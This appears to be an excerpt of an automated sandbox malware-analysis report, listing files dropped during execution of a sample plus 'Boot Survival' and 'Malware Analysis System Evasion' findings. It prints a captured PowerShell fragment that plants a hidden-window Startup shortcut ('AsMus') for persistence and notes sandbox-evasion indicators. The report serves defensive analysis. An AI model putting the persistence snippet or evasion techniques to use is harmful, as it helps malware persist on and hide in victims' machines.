    Source: C2R64.dll.6.dr Static PE information: section name: .detourc
    Source: c2r64werhandler.dll.6.dr Static PE information: section name: .didat
    Source: c2r64werhandler.dll.6.dr Static PE information: section name: .fptable
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-xstate-l2-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-localization-l1-2-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.uk-ua.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nl-nl.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\inventory.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.et-ee.dll (copy)Jump to dropped file
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exe | File created: C:\Users\user\AppData\Local\Temp\918D.tmp
    Source: C:\Users\user\AppData\Local\Temp\918D.tmp | File created: C:\Users\Public\Music\script\918D.tmp (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fr-fr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\c2r32werhandler.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vccorlib140.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-timezone-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\IntegratedOffice.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.pt-pt.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.hr-hr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeOEMPlugin.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvSubsystemController.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2R64.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\concrt140.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sr-latn-rs.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\MavInject32.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.fr-ca.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.es-es.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ms-my.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\appvcleaner.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-xstate-l2-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\OfficeOEMPlugin.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\manageability.dllJump to dropped file

    Boot Survival

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() @{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Script
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AsMus.lnk
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Registry key monitored for changes: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData 1.16
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\AppData\Local\Temp\872C.tmp System information queried: FirmwareTableInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3899
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2490
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-synch-l1-2-0.dll (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-processthreads-l1-1-1.dll (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVPolicy.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVManifest.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-private-l1-1-0.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-cn.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.hu-hu.dll (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVCatalog.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVShNotify.exe (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.nb-no.dll (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-string-l1-1-0.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-locale-l1-1-0.dll (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.en-us.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\MavInject32.exe (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-runtime-l1-1-0.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.el-gr.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\ApiClient.dll (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-file-l2-1-0.dll (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVPolicy.dll (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sr-latn-rs.dll (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-localization-l1-2-0.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sk-sk.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sv-se.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ApiClient.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvStreamingManager.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.he-il.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVManifest.dll (copy)
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.bg-bg.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\repoman.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-stdio-l1-1-0.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fi-fi.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RClient.exe
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fr-ca.dll
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ro-ro.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\officesvcmgr.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-process-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sl-si.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-conio-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.th-th.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\vcruntime140_1.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-filesystem-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.cs-cz.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\repoman.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-multibyte-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppvIsvSubsystems64.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems64.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ja-jp.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvVirtualization.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVOrchestration.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\manageability.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.he-il.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ro-ro.dll (copy)Jump to dropped file
